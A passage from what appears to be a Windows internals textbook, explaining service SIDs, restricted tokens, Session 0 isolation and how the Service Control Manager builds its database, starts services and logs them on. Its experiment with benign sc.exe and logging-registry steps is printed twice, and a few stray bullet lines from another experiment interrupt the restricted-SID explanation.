service SIDs inside the process during service startup or shutdown.) A service running with the SYSTEM
account launched with an unrestricted token is even more powerful than a standard SYSTEM service.
A restricted service SID, on the other hand, turns the service-hosting process’s token into a write-
restricted token. Restricted tokens (see Chapter 7 of Part 1 for more information on tokens) generally
require the system to perform two access checks while accessing securable objects: one using the stan-
dard token’s enabled group SIDs list, and another using the list of restricted SIDs. For a standard restricted
token, access is granted only if both access checks allow the requested access rights. On the other hand,
write-restricted tokens (which are usually created by specifying the WRITE_RESTRICTED flag to the
CreateRestrictedToken API) perform the double access checks only for write requests: read-only access
requests raise just one access check on the token’s enabled group SIDs as for regular tokens.
The service host process running with a write-restricted token can write only to objects granting
explicit write access to the service SID (and the following three supplemental SIDs added for compat-
ibility), regardless of the account it’s running. Because of this, all services running inside that pro-
cess (part of the same service group) must have the restricted SID type; otherwise, services with the
restricted SID type fail to start. Once the token becomes write-restricted, three more SIDs are added
for compatibility reasons:
I
0xA1917B4A (third DWORD value), which equals 2710666058 in decimal
I
0x631F189C (fourth DWORD value), which equals 1662982300 in decimal
I
0x3D085DD7 (fifth DWORD value), which equals 1023958487 in decimal
If you combine the numbers and add the service SID authority value and first RID (S-1-5-80),
you build the same SID shown by Process Explorer. This demonstrates how the system generates
service SIDs.
442
CHAPTER 10 Management, diagnostics, and tracing
I
The world SID is added to allow write access to objects that are normally accessible by anyone
anyway, most importantly certain DLLs in the load path.
I
The service logon SID is added to allow the service to communicate with the SCM.
I
The write-restricted SID is added to allow objects to explicitly allow any write-restricted service
write access to them. For example, ETW uses this SID on its objects to allow any write-restricted
service to generate events.
Figure 10-11 shows an example of a service-hosting process containing services that have been
marked as having restricted service SIDs. For example, the Base Filtering Engine (BFE), which is respon-
sible for applying Windows Firewall filtering rules, is part of this hosting process because these rules are
stored in registry keys that must be protected from malicious write access should a service be compro-
mised. (This could allow a service exploit to disable the outgoing traffic firewall rules, enabling bidirec-
tional communication with an attacker, for example.)
FIGURE 10-11 Service with restricted SIDs.
CHAPTER 10 Management, diagnostics, and tracing
443
By blocking write access to objects that would otherwise be writable by the service (through inherit-
ing the permissions of the account it is running as), restricted service SIDs solve the other side of the
problem we initially presented because users do not need to do anything to prevent a service running
in a privileged account from having write access to critical system files, registry keys, or other objects,
limiting the attack exposure of any such service that might have been compromised.
Windows also allows for firewall rules that reference service SIDs linked to one of the three behav-
iors described in Table 10-11.
TABLE 10-11 Network restriction rules
Scenario
Example
Restrictions
Network access blocked
The shell hardware detection service
(ShellHWDetection).
All network communications are blocked
(both incoming and outgoing).
Network access statically
port-restricted
The RPC service (Rpcss) operates on port
135 (TCP and UDP).
Network communications are restricted to
specific TCP or UDP ports.
Network access dynamically
port-restricted
The DNS service (Dns) listens on variable
ports (UDP).
Network communications are restricted to
configurable TCP or UDP ports.
The virtual service account
As introduced in the previous section, a service SID also can be set as the owner of the token of a
service running in the context of a virtual service account. A service running with a virtual service ac-
count has fewer privileges than the LocalService or NetworkService service types (refer to Table 10-10
for the list of privileges) and no credentials available to authenticate it through the network. The
Service SID is the token’s owner, and the token is part of the Everyone, Users, Authenticated Users, and
All Services groups. This means that the service can read (or write, unless the service uses a restricted
SID type) objects that belong to standard users but not to high-privileged ones belonging to the
Administrator or System group. Unlike the other types, a service running with a virtual service ac-
count has a private profile, which is loaded by the ProfSvc service (Profsvc.dll) during service logon, in
a similar way as for regular services (more details in the “Service logon” section). The profile is initially
created during the first service logon using a folder with the same name as the service located in the
%SystemRoot%\ServiceProfiles path. When the service’s profile is loaded, its registry hive is mounted
in the HKEY_USERS root key, under a key named as the virtual service account’s human readable SID
(starting with S-1-5-80 as explained in the “Understanding service SIDs” experiment).
Users can easily assign a virtual service account to a service by setting the log-on account to NT
SERVICE\<ServiceName>, where <ServiceName> is the name of the service. At logon time, the Service
Control Manager recognizes that the log-on account is a virtual service account (thanks to the NT
SERVICE logon provider) and verifies that the account’s name corresponds to the name of the ser-
vice. A service can’t be started using a virtual service account that belongs to another one, and this
is enforced by SCM (through the internal ScIsValidAccountName function). Services that share a host
process cannot run with a virtual service account.
While operating with securable objects, users can add to the object’s ACL using the service log-on
account (in the form of NT SERVICE\<ServiceName>), an ACE that allows or denies access to a virtual
444
CHAPTER 10 Management, diagnostics, and tracing
service. As shown in Figure 10-12, the system is able to translate the virtual service account’s name to
the proper SID, thus establishing fine-grained access control to the object from the service. (This also
works for regular services running with a nonsystem account, as explained in the previous section.)
FIGURE 10-12 A file (securable object) with an ACE allowing full access to the TestService.
Interactive services and Session 0 Isolation
One restriction for services running under a proper service account, the local system, local service, and
network service accounts that has always been present in Windows is that these services could not display
dialog boxes or windows on the interactive user’s desktop. This limitation wasn’t the direct result of run-
ning under these accounts but rather a consequence of the way the Windows subsystem assigns service
processes to window stations. This restriction is further enhanced by the use of sessions, in a model called
Session 0 Isolation, a result of which is that services cannot directly interact with a user’s desktop.
The Windows subsystem associates every Windows process with a window station. A window station
contains desktops, and desktops contain windows. Only one window station can be visible at a time
and receive user mouse and keyboard input. In a Terminal Services environment, one window station
per session is visible, but services all run as part of the hidden session 0. Windows names the visible
window station WinSta0, and all interactive processes access WinSta0.
Unless otherwise directed, the Windows subsystem associates services running within the proper
service account or the local system account with a nonvisible window station named Service-0x0-
3e7$ that all noninteractive services share. The number in the name, 3e7, represents the logon session
identifier that the Local Security Authority process (LSASS) assigns to the logon session the SCM uses
CHAPTER 10 Management, diagnostics, and tracing
445
for noninteractive services running in the local system account. In a similar way, services running in the
Local service account are associated with the window station generated by the logon session 3e5, while
services running in the network service account are associated with the window station generated by
the logon session 3e4.
Services configured to run under a user account (that is, not the local system account) are run in a
different nonvisible window station named with the LSASS logon identifier assigned for the service’s
logon session. Figure 10-13 shows a sample display from the Sysinternals WinObj tool that shows the
object manager directory in which Windows places window station objects. Visible are the interactive
window station (WinSta0) and the three noninteractive services window stations.
FIGURE 10-13 List of window stations.
Regardless of whether services are running in a user account, the local system account, or the local
or network service accounts, services that aren’t running on the visible window station can’t receive
input from a user or display visible windows. In fact, if a service were to pop up a modal dialog box,
the service would appear hung because no user would be able to see the dialog box, which of course
would prevent the user from providing keyboard or mouse input to dismiss it and allow the service to
continue executing.
A service could have a valid reason to interact with the user via dialog boxes or windows. Services
configured using the SERVICE_INTERACTIVE_PROCESS flag in the service’s registry key’s Type parameter
are launched with a hosting process connected to the interactive WinSta0 window station. (Note that
services configured to run under a user account can’t be marked as interactive.) Were user processes to
run in the same session as services, this connection to WinSta0 would allow the service to display dialog
446
CHAPTER 10 Management, diagnostics, and tracing
boxes and windows and enable those windows to respond to user input because they would share the
window station with the interactive services. However, only processes owned by the system and Windows
services run in session 0; all other logon sessions, including those of console users, run in different ses-
sions. Therefore, any window displayed by processes in session 0 is not visible to the user.
This additional boundary helps prevent shatter attacks, whereby a less-privileged application sends
window messages to a window visible on the same window station to exploit a bug in a more privi-
leged process that owns the window, which permits it to execute code in the more privileged process.
In the past, Windows included the Interactive Services Detection service (UI0Detect), which notified
users when a service had displayed a window on the main desktop of the WinSta0 window station of
Session 0. This would allow the user to switch to the session 0’s window station, making interactive
services run properly. For security purposes, this feature was first disabled; since Windows 10 April 2018
Update (RS4), it has been completely removed.
As a result, even though interactive services are still supported by the Service Control Manager (only
by setting the HKLM\SYSTEM\CurrentControlSet\Control\Windows\NoInteractiveServices registry
value to 0), access to session 0 is no longer possible. No service can display any window anymore (at
least without some undocumented hack).
The Service Control Manager (SCM)
The SCM’s executable file is %SystemRoot%\System32\Services.exe, and like most service processes, it
runs as a Windows console program. The Wininit process starts the SCM early during the system boot.
(Refer to Chapter 12 for details on the boot process.) The SCM’s startup function, SvcCtrlMain, orches-
trates the launching of services that are configured for automatic startup.
SvcCtrlMain first performs its own initialization by setting its process secure mitigations and
unhandled exception filter and by creating an in-memory representation of the well-known SIDs. It
then creates two synchronization events: one named SvcctrlStartEvent_A3752DX and the other named
SC_AutoStartComplete. Both are initialized as nonsignaled. The first event is signaled by the SCM after
all the steps necessary to receive commands from SCPs are completed. The second is signaled when the
entire initialization of the SCM is completed. The event is used for preventing the system or other users
from starting another instance of the Service Control Manager. The function that an SCP uses to estab-
lish a dialog with the SCM is OpenSCManager. OpenSCManager prevents an SCP from trying to contact
the SCM before the SCM has initialized by waiting for SvcctrlStartEvent_A3752DX to become signaled.
Next, SvcCtrlMain gets down to business, creates a proper security descriptor, and calls
ScGenerateServiceDB, the function that builds the SCM’s internal service database. ScGenerateServiceDB
reads and stores the contents of HKLM\SYSTEM\CurrentControlSet\Control\ServiceGroupOrder\List,
a REG_MULTI_SZ value that lists the names and order of the defined service groups. A service’s registry
key contains an optional Group value if that service or device driver needs to control its startup order-
ing with respect to services from other groups. For example, the Windows networking stack is built
from the bottom up, so networking services must specify Group values that place them later in the
startup sequence than networking device drivers. The SCM internally creates a group list that preserves
the ordering of the groups it reads from the registry. Groups include (but are not limited to) NDIS, TDI,
Primary Disk, Keyboard Port, Keyboard Class, Filters, and so on. Add-on and third-party applications
CHAPTER 10 Management, diagnostics, and tracing
447
can even define their own groups and add them to the list. Microsoft Transaction Server, for example,
adds a group named MS Transactions.
ScGenerateServiceDB then scans the contents of HKLM\SYSTEM\CurrentControlSet\Services, creat-
ing an entry (called “service record”) in the service database for each key it encounters. A database
entry includes all the service-related parameters defined for a service as well as fields that track the
service’s status. The SCM adds entries for device drivers as well as for services because the SCM starts
services and drivers marked as autostart and detects startup failures for drivers marked boot-start and
system-start. It also provides a means for applications to query the status of drivers. The I/O manager
loads drivers marked boot-start and system-start before any user-mode processes execute, and there-
fore any drivers having these start types load before the SCM starts.
ScGenerateServiceDB reads a service’s Group value to determine its membership in a group and
associates this value with the group’s entry in the group list created earlier. The function also reads and
records in the database the service’s group and service dependencies by querying its DependOnGroup
and DependOnService registry values. Figure 10-14 shows how the SCM organizes the service entry
and group order lists. Notice that the service list is sorted alphabetically. The reason this list is sorted
alphabetically is that the SCM creates the list from the Services registry key, and Windows enumerates
registry keys alphabetically.
Service database
Group order list
Service entry list
Service1
Type
Start
DependOnGroup
DependOnService
Status
Group
…
Service2
Type
Start
DependOnGroup
DependOnService
Status
Group
…
Service3
Type
Start
DependOnGroup
DependOnService
Status
Group
…
Group1
Group2
Group3
FIGURE 10-14 Organization of the service database.
During service startup, the SCM calls on LSASS (for example, to log on a service in a nonlocal system
account), so the SCM waits for LSASS to signal the LSA_RPC_SERVER_ACTIVE synchronization event,
which it does when it finishes initializing. Wininit also starts the LSASS process, so the initialization of
LSASS is concurrent with that of the SCM, and the order in which LSASS and the SCM complete initial-
ization can vary. The SCM cleans up (from the registry, other than from the database) all the services
that were marked as deleted (through the DeleteFlag registry value) and generates the dependency list
for each service record in the database. This allows the SCM to know which service is dependent on a
particular service record, which is the opposite dependency information compared to the one stored
in the registry.
448
CHAPTER 10 Management, diagnostics, and tracing
The SCM then queries whether the system is started in safe mode (from the HKLM\System\
CurrentControlSet\ Control\Safeboot\Option\OptionValue registry value). This check is needed for
determining later if a service should start (details are explained in the “Autostart services startup”
section later in this chapter). It then creates its remote procedure call (RPC) named pipe, which is
named \Pipe\Ntsvcs, and then RPC launches a thread to listen on the pipe for incoming messages
from SCPs. The SCM signals its initialization-complete event, SvcctrlStartEvent_A3752DX. Registering a
console application shutdown event handler and registering with the Windows subsystem process via
RegisterServiceProcess prepares the SCM for system shutdown.
Before starting the autostart services, the SCM performs a few more steps. It initializes the UMDF
driver manager, which is responsible in managing UMDF drivers. Since Windows 10 Fall Creators
Update (RS3), it’s part of the Service Control Manager and waits for the known DLLs to be fully initial-
ized (by waiting on the \KnownDlls\SmKnownDllsInitialized event that’s signaled by Session Manager).
EXPERIMENT: Enable services logging
The Service Control Manager usually logs ETW events only when it detects abnormal error con-
ditions (for example, while failing to start a service or to change its configuration). This behavior
can be overridden by manually enabling or disabling a different kind of SCM events. In this ex-
periment, you will enable two kinds of events that are particularly useful for debugging a service
change of state. Events 7036 and 7042 are raised when a service change status or when a STOP
control request is sent to a service.
Those two events are enabled by default on server SKUs but not on client editions of
Windows 10. Using your Windows 10 machine, you should open the Registry Editor (by typing
regedit.exe in the Cortana search box) and navigate to the following registry key: HKLM\
SYSTEM\CurrentControlSet\Control\ScEvents. If the last subkey does not exist, you should create
it by right-clicking the Control subkey and selecting the Key item from the New context menu).
Now you should create two DWORD values and name them 7036 and 7042. Set the data of the
two values to 1. (You can set them to 0 to gain the opposite effect of preventing those events from
being generated, even on Server SKUs.) You should get a registry state like the following one:
EXPERIMENT: Enable services logging
The Service Control Manager usually logs ETW events only when it detects abnormal error con-
ditions (for example, while failing to start a service or to change its configuration). This behavior
can be overridden by manually enabling or disabling a different kind of SCM events. In this ex-
periment, you will enable two kinds of events that are particularly useful for debugging a service
change of state. Events 7036 and 7042 are raised when a service change status or when a STOP
control request is sent to a service.
Those two events are enabled by default on server SKUs but not on client editions of
Windows 10. Using your Windows 10 machine, you should open the Registry Editor (by typing
regedit.exe in the Cortana search box) and navigate to the following registry key: HKLM\
SYSTEM\CurrentControlSet\Control\ScEvents. If the last subkey does not exist, you should create
it by right-clicking the Control subkey and selecting the Key item from the New context menu).
Now you should create two DWORD values and name them 7036 and 7042. Set the data of the
two values to 1. (You can set them to 0 to gain the opposite effect of preventing those events from
being generated, even on Server SKUs.) You should get a registry state like the following one:
CHAPTER 10 Management, diagnostics, and tracing
449
Restart your workstation, and then start and stop a service (for example, the AppXSvc service)
using the sc.exe tool by opening an administrative command prompt and typing the following
commands:
sc stop AppXSvc
sc start AppXSvc
Open the Event Viewer (by typing eventvwr in the Cortana search box) and navigate to
Windows Logs and then System. You should note different events from the Service Control
Manager with Event ID 7036 and 7042. In the top ones, you should find the stop event generated
by the AppXSvc service, as shown in the following figure:
Note that the Service Control Manager by default logs all the events generated by services
started automatically at system startup. This can generate an undesired number of events flood-
ing the System event log. To mitigate the problem, you can disable SCM autostart events by
creating a registry value named EnableAutostartEvents in the HKLM\System\CurrentControlSet\
Control key and set it to 0 (the default implicit value is 1 in both client and server SKUs). As a
result, this will log only events generated by service applications when starting, pausing, or stop-
ping a target service.
Restart your workstation, and then start and stop a service (for example, the AppXSvc service)
using the sc.exe tool by opening an administrative command prompt and typing the following
commands:
sc stop AppXSvc
sc start AppXSvc
Open the Event Viewer (by typing eventvwr in the Cortana search box) and navigate to
Windows Logs and then System. You should note different events from the Service Control
Manager with Event ID 7036 and 7042. In the top ones, you should find the stop event generated
by the AppXSvc service, as shown in the following figure:
Note that the Service Control Manager by default logs all the events generated by services
started automatically at system startup. This can generate an undesired number of events flood-
ing the System event log. To mitigate the problem, you can disable SCM autostart events by
creating a registry value named EnableAutostartEvents in the HKLM\System\CurrentControlSet\
Control key and set it to 0 (the default implicit value is 1 in both client and server SKUs). As a
result, this will log only events generated by service applications when starting, pausing, or stop-
ping a target service.
450
CHAPTER 10 Management, diagnostics, and tracing
Network drive letters
In addition to its role as an interface to services, the SCM has another totally unrelated responsibil-
ity: It notifies GUI applications in a system whenever the system creates or deletes a network drive-
letter connection. The SCM waits for the Multiple Provider Router (MPR) to signal a named event,
\BaseNamedObjects\ScNetDrvMsg, which MPR signals whenever an application assigns a drive letter
to a remote network share or deletes a remote-share drive-letter assignment. When MPR signals the
event, the SCM calls the GetDriveType Windows function to query the list of connected network drive
letters. If the list changes across the event signal, the SCM sends a Windows broadcast message of type
WM_DEVICECHANGE. The SCM uses either DBT_DEVICEREMOVECOMPLETE or DBT_DEVICEARRIVAL
as the message’s subtype. This message is primarily intended for Windows Explorer so that it can up-
date any open computer windows to show the presence or absence of a network drive letter.
Service control programs
As introduced in the “Service applications” section, service control programs (SCPs) are stan-
dard Windows applications that use SCM service management functions, including CreateService,
OpenService, StartService, ControlService, QueryServiceStatus, and DeleteService. To use the SCM func-
tions, an SCP must first open a communications channel to the SCM by calling the OpenSCManager
function to specify what types of actions it wants to perform. For example, if an SCP simply wants
to enumerate and display the services present in the SCM’s database, it requests enumerate-service
access in its call to OpenSCManager. During its initialization, the SCM creates an internal object that
represents the SCM database and uses the Windows security functions to protect the object with a
security descriptor that specifies what accounts can open the object with what access permissions. For
example, the security descriptor indicates that the Authenticated Users group can open the SCM object
with enumerate-service access. However, only administrators can open the object with the access
required to create or delete a service.
As it does for the SCM database, the SCM implements security for services themselves. When an
SCP creates a service by using the CreateService function, it specifies a security descriptor that the
SCM associates internally with the service’s entry in the service database. The SCM stores the security
descriptor in the service’s registry key as the Security value, and it reads that value when it scans the
registry’s Services key during initialization so that the security settings persist across reboots. In the
same way that an SCP must specify what types of access it wants to the SCM database in its call to
OpenSCManager, an SCP must tell the SCM what access it wants to a service in a call to OpenService.
Accesses that an SCP can request include the ability to query a service’s status and to configure, stop,
and start a service.
The SCP you’re probably most familiar with is the Services MMC snap-in that’s included in Windows,
which resides in %SystemRoot%\System32\Filemgmt.dll. Windows also includes Sc.exe (Service
Controller tool), a command-line service control program that we’ve mentioned multiple times.
SCPs sometimes layer service policy on top of what the SCM implements. A good example is the
timeout that the Services MMC snap-in implements when a service is started manually. The snap-in
presents a progress bar that represents the progress of a service’s startup. Services indirectly inter-
act with SCPs by setting their configuration status to reflect their progress as they respond to SCM
CHAPTER 10 Management, diagnostics, and tracing
451
commands such as the start command. SCPs query the status with the QueryServiceStatus function.
They can tell when a service actively updates the status versus when a service appears to be hung, and
the SCM can take appropriate actions in notifying a user about what the service is doing.
Autostart services startup
SvcCtrlMain invokes the SCM function ScAutoStartServices to start all services that have a Start value
designating autostart (except delayed autostart and user services). ScAutoStartServices also starts auto-
start drivers. To avoid confusion, you should assume that the term services means services and drivers
unless indicated otherwise. ScAutoStartServices begins by starting two important and basic services,
named Plug and Play (implemented in the Umpnpmgr.dll library) and Power (implemented in the
Umpo.dll library), which are needed by the system for managing plug-and-play hardware and power
interfaces. The SCM then registers its Autostart WNF state, used to indicate the current autostart phase
to the Power and other services.
Before the starting of other services can begin, the ScAutoStartService routine calls ScGetBootAnd
SystemDriverState to scan the service database looking for boot-start and system-start device driver
entries. ScGetBootAndSystemDriverState determines whether a driver with the start type set to Boot
Start or System Start successfully started by looking up its name in the object manager namespace
directory named \Driver. When a device driver successfully loads, the I/O manager inserts the driver’s
object in the namespace under this directory, so if its name isn’t present, it hasn’t loaded. Figure 10-15
shows WinObj displaying the contents of the Driver directory. ScGetBootAndSystemDriverState
notes the names of drivers that haven’t started and that are part of the current profile in a list named
ScStoppedDrivers. The list will be used later at the end of the SCM initialization for logging an event to
the system event log (ID 7036), which contains the list of boot drivers that have failed to start.
FIGURE 10-15 List of driver objects.
452
CHAPTER 10 Management, diagnostics, and tracing
The algorithm in ScAutoStartServices for starting services in the correct order proceeds in phases,
whereby a phase corresponds to a group and phases proceed in the sequence defined by the group
ordering stored in the HKLM\SYSTEM\CurrentControlSet\Control\ServiceGroupOrder\List registry
value. The List value, shown in Figure 10-16, includes the names of groups in the order that the SCM
should start them. Thus, assigning a service to a group has no effect other than to fine-tune its startup
with respect to other services belonging to different groups.
FIGURE 10-16 ServiceGroupOrder registry key.
When a phase starts, ScAutoStartServices marks all the service entries belonging to the phase’s
group for startup. Then ScAutoStartServices loops through the marked services to see whether it can
start each one. Part of this check includes seeing whether the service is marked as delayed autostart or
a user template service; in both cases, the SCM will start it at a later stage. (Delayed autostart services
must also be ungrouped. User services are discussed later in the “User services” section.) Another part
of the check it makes consists of determining whether the service has a dependency on another group,
as specified by the existence of the DependOnGroup value in the service’s registry key. If a dependency
exists, the group on which the service is dependent must have already initialized, and at least one
service of that group must have successfully started. If the service depends on a group that starts later
than the service’s group in the group startup sequence, the SCM notes a “circular dependency” error
for the service. If ScAutoStartServices is considering a Windows service or an autostart device driver,
it next checks to see whether the service depends on one or more other services; if it is dependent, it
determines whether those services have already started. Service dependencies are indicated with the
DependOnService registry value in a service’s registry key. If a service depends on other services that
belong to groups that come later in the ServiceGroupOrder\List, the SCM also generates a “circular
dependency” error and doesn’t start the service. If the service depends on any services from the same
group that haven’t yet started, the service is skipped.
CHAPTER 10 Management, diagnostics, and tracing
453
When the dependencies of a service have been satisfied, ScAutoStartServices makes a final check
to see whether the service is part of the current boot configuration before starting the service. When
the system is booted in safe mode, the SCM ensures that the service is either identified by name or by
group in the appropriate safe boot registry key. There are two safe boot keys, Minimal and Network,
under HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot, and the one that the SCM checks depends
on what safe mode the user booted. If the user chose Safe Mode or Safe Mode With Command Prompt
at the modern or legacy boot menu, the SCM references the Minimal key; if the user chose Safe Mode
With Networking, the SCM refers to Network. The existence of a string value named Option under the
SafeBoot key indicates not only that the system booted in safe mode but also the type of safe mode the
user selected. For more information about safe boots, see the section “Safe mode” in Chapter 12.
Service start
Once the SCM decides to start a service, it calls StartInternal, which takes different steps for services
than for device drivers. When StartInternal starts a Windows service, it first determines the name of
the file that runs the service’s process by reading the ImagePath value from the service’s registry key.
If the service file corresponds to LSASS.exe, the SCM initializes a control pipe, connects to the already-
running LSASS process, and waits for the LSASS process response. When the pipe is ready, the LSASS
process connects to the SCM by calling the classical StartServiceCtrlDispatcher routine. As shown in
Figure 10-17, some services like Credential Manager or Encrypting File System need to cooperate with
the Local Security Authority Subsystem Service (LSASS)—usually for performing cryptography opera-
tion for the local system policies (like passwords, privileges, and security auditing. See Chapter 7 of Part
1 for more details).
FIGURE 10-17 Services hosted by the Local Security Authority Subsystem Service (LSASS) process.
454
CHAPTER 10 Management, diagnostics, and tracing
The SCM then determines whether the service is critical (by analyzing the FailureAction registry value)
or is running under WoW64. (If the service is a 32-bit service, the SCM should apply file system redirec-
tion. See the “WoW64” section of Chapter 8 for more details.) It also examines the service’s Type value. If
the following conditions apply, the SCM initiates a search in the internal Image Record Database:
I
The service type value includes SERVICE_WINDOWS_SHARE_PROCESS (0x20).
I
The service has not been restarted after an error.
I
Svchost service splitting is not allowed for the service (see the “Svchost service splitting” section
later in this chapter for further details).
An Image record is a data structure that represents a launched process hosting at least one service.
If the preceding conditions apply, the SCM searches an image record that has the same process execut-
able’s name as the new service ImagePath value.
If the SCM locates an existing image database entry with matching ImagePath data, the service can
be shared, and one of the hosting processes is already running. The SCM ensures that the found host-
ing process is logged on using the same account as the one specified for the service being started. (This
is to ensure that the service is not configured with the wrong account, such as a LocalService account,
but with an image path pointing to a running Svchost, such as netsvcs, which runs as LocalSystem.) A
service’s ObjectName registry value stores the user account in which the service should run. A service
with no ObjectName or an ObjectName of LocalSystem runs in the local system account. A process can
be logged on as only one account, so the SCM reports an error when a service specifies a different ac-
count name than another service that has already started in the same process.
If the image record exists, before the new service can be run, another final check should be per-
formed: The SCM opens the token of the currently executing host process and checks whether the nec-
essary service SID is located in the token (and all the required privileges are enabled). Even in this case,
the SCM reports an error if the condition is not verified. Note that, as we describe in the next section
(“Service logon”), for shared services, all the SIDs of the hosted services are added at token creation
time. It is not possible for any user-mode component to add group SIDs in a token after the token has
already been created.
If the image database doesn’t have an entry for the new service ImagePath value, the SCM creates
one. When the SCM creates a new entry, it stores the logon account name used for the service and
the data from the service’s ImagePath value. The SCM requires services to have an ImagePath value.
If a service doesn’t have an ImagePath value, the SCM reports an error stating that it couldn’t find the
service’s path and isn’t able to start the service. After the SCM creates an image record, it logs on the
service account and starts the new hosting process. (The procedure is described in the next section,
“Service logon.”)
After the service has been logged in, and the host process correctly started, the SCM waits for the
initial “connection” message from the service. The service connects to SCM thanks to the SCM RPC pipe
(\Pipe\Ntsvcs, as described in the “The Service Control Manager” section) and to a Channel Context
data structure built by the LogonAndStartImage routine. When the SCM receives the first message, it
proceeds to start the service by posting a SERVICE_CONTROL_START control message to the service
process. Note that in the described communication protocol is always the service that connects to SCM.
CHAPTER 10 Management, diagnostics, and tracing
455
The service application is able to process the message thanks to the message loop located in the
StartServiceCtrlDispatcher API (see the “Service applications” section earlier in this chapter for more de-
tails). The service application enables the service group SID in its token (if needed) and creates the new
service thread (which will execute the Service Main function). It then calls back into the SCM for creat-
ing a handle to the new service, storing it in an internal data structure (INTERNAL_DISPATCH_TABLE)
similar to the service table specified as input to the StartServiceCtrlDispatcher API. The data structure is
used for tracking the active services in the hosting process. If the service fails to respond positively to
the start command within the timeout period, the SCM gives up and notes an error in the system Event
Log that indicates the service failed to start in a timely manner.
If the service the SCM starts with a call to StartInternal has a Type registry value of SERVICE_KERNEL_
DRIVER or SERVICE_FILE_SYSTEM_DRIVER, the service is really a device driver, so StartInternal enables
the load driver security privilege for the SCM process and then invokes the kernel service NtLoadDriver,
passing in the data in the ImagePath value of the driver’s registry key. Unlike services, drivers don’t
need to specify an ImagePath value, and if the value is absent, the SCM builds an image path by ap-
pending the driver’s name to the string %SystemRoot%\System32\ Drivers\.
Note A device driver with the start value of SERVICE_AUTO_START or SERVICE_DEMAND_
START is started by the SCM as a runtime driver, which implies that the resulting loaded
image uses shared pages and has a control area that describes them. This is different than
drivers with the start value of SERVICE_BOOT_START or SERVICE_SYSTEM_START, which are
loaded by the Windows Loader and started by the I/O manager. Those drivers all use private
pages and are neither sharable nor have an associated Control Area.
More details are available in Chapter 5 in Part 1.
ScAutoStartServices continues looping through the services belonging to a group until all the
services have either started or generated dependency errors. This looping is the SCM’s way of auto-
matically ordering services within a group according to their DependOnService dependencies. The SCM
starts the services that other services depend on in earlier loops, skipping the dependent services until
subsequent loops. Note that the SCM ignores Tag values for Windows services, which you might come
across in subkeys under the HKLM\SYSTEM\CurrentControlSet\Services key; the I/O manager honors
Tag values to order device driver startup within a group for boot-start and system-start drivers. Once
the SCM completes phases for all the groups listed in the ServiceGroupOrder\List value, it performs
a phase for services belonging to groups not listed in the value and then executes a final phase for
services without a group.
After handling autostart services, the SCM calls ScInitDelayStart, which queues a delayed work item
associated with a worker thread responsible for processing all the services that ScAutoStartServices
skipped because they were marked delayed autostart (through the DelayedAutostart registry value).
This worker thread will execute after the delay. The default delay is 120 seconds, but it can be overrid-
den by the creating an AutoStartDelay value in HKLM\SYSTEM\CurrentControlSet\Control. The SCM
performs the same actions as those executed during startup of nondelayed autostart services.
456
CHAPTER 10 Management, diagnostics, and tracing
When the SCM finishes starting all autostart services and drivers, as well as setting up the delayed
autostart work item, the SCM signals the event \BaseNamedObjects\SC_AutoStartComplete. This event
is used by the Windows Setup program to gauge startup progress during installation.
Service logon
During the start procedure, if the SCM does not find any existing image record, it means that the host
process needs to be created. Indeed, the new service is not shareable, it’s the first one to be executed,
it has been restarted, or it’s a user service. Before starting the process, the SCM should create an access
token for the service host process. The LogonAndStartImage function’s goal is to create the token and
start the service’s host process. The procedure depends on the type of service that will be started.
User services (more precisely user service instances) are started by retrieving the current
logged-on user token (through functions implemented in the UserMgr.dll library). In this case, the
LogonAndStartImage function duplicates the user token and adds the “WIN://ScmUserService” security
attribute (the attribute value is usually set to 0). This security attribute is used primarily by the Service
Control Manager when receiving connection requests from the service. Although SCM can recognize
a process that’s hosting a classical service through the service SID (or the System account SID if the
service is running under the Local System Account), it uses the SCM security attribute for identifying a
process that’s hosting a user service.
For all other type of services, the SCM reads the account under which the service will be started
from the registry (from the ObjectName value) and calls ScCreateServiceSids with the goal to create a
service SID for each service that will be hosted by the new process. (The SCM cycles between each ser-
vice in its internal service database.) Note that if the service runs under the LocalSystem account (with
no restricted nor unrestricted SID), this step is not executed.
The SCM logs on services that don’t run in the System account by calling the LSASS function
LogonUserExEx. LogonUserExEx normally requires a password, but normally the SCM indicates to LSASS
that the password is stored as a service’s LSASS “secret” under the key HKLM\SECURITY\Policy\Secrets
in the registry. (Keep in mind that the contents of SECURITY aren’t typically visible because its default
security settings permit access only from the System account.) When the SCM calls LogonUserExEx, it
specifies a service logon as the logon type, so LSASS looks up the password in the Secrets subkey that
has a name in the form _SC_<Service Name>.
Note Services running with a virtual service account do not need a password for having
their service token created by the LSA service. For those services, the SCM does not provide
any password to the LogonUserExEx API.
The SCM directs LSASS to store a logon password as a secret using the LsaStorePrivateData function
when an SCP configures a service’s logon information. When a logon is successful, LogonUserEx returns
a handle to an access token to the caller. The SCM adds the necessary service SIDs to the returned
token, and, if the new service uses restricted SIDs, invokes the ScMakeServiceTokenWriteRestricted
CHAPTER 10 Management, diagnostics, and tracing
457
function, which transforms the token in a write-restricted token (adding the proper restricted SIDs).
Windows uses access tokens to represent a user’s security context, and the SCM later associates the
access token with the process that implements the service.
Next, the SCM creates the user environment block and security descriptor to associate with the
new service process. In case the service that will be started is a packaged service, the SCM reads all the
package information from the registry (package full name, origin, and application user model ID) and
calls the Appinfo service, which stamps the token with the necessary AppModel security attributes and
prepares the service process for the modern package activation. (See the “Packaged applications” sec-
tion in Chapter 8 for more details about the AppModel.)
After a successful logon, the SCM loads the account’s profile information, if it’s not already loaded,
by calling the User Profile Basic Api DLL’s (%SystemRoot%\System32\Profapi.dll) LoadProfileBasic
function. The value HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\<user profile
key>\ProfileImagePath contains the location on disk of a registry hive that LoadUserProfile loads into
the registry, making the information in the hive the HKEY_CURRENT_USER key for the service.
As its next step, LogonAndStartImage proceeds to launch the service’s process. The SCM starts the
process in a suspended state with the CreateProcessAsUser Windows function. (Except for a process
hosting services under a local system account, which are created through the standard CreateProcess
API. The SCM already runs with a SYSTEM token, so there is no need of any other logon.)
Before the process is resumed, the SCM creates the communication data structure that allows the
service application and the SCM to communicate through asynchronous RPCs. The data structure con-
tains a control sequence, a pointer to a control and response buffer, service and hosting process data
(like the PID, the service SID, and so on), a synchronization event, and a pointer to the async RPC state.
The SCM resumes the service process via the ResumeThread function and waits for the ser-
vice to connect to its SCM pipe. If it exists, the registry value HKLM\SYSTEM\CurrentControlSet\
Control\ServicesPipeTimeout determines the length of time that the SCM waits for a service to call
StartServiceCtrlDispatcher and connect before it gives up, terminates the process, and concludes
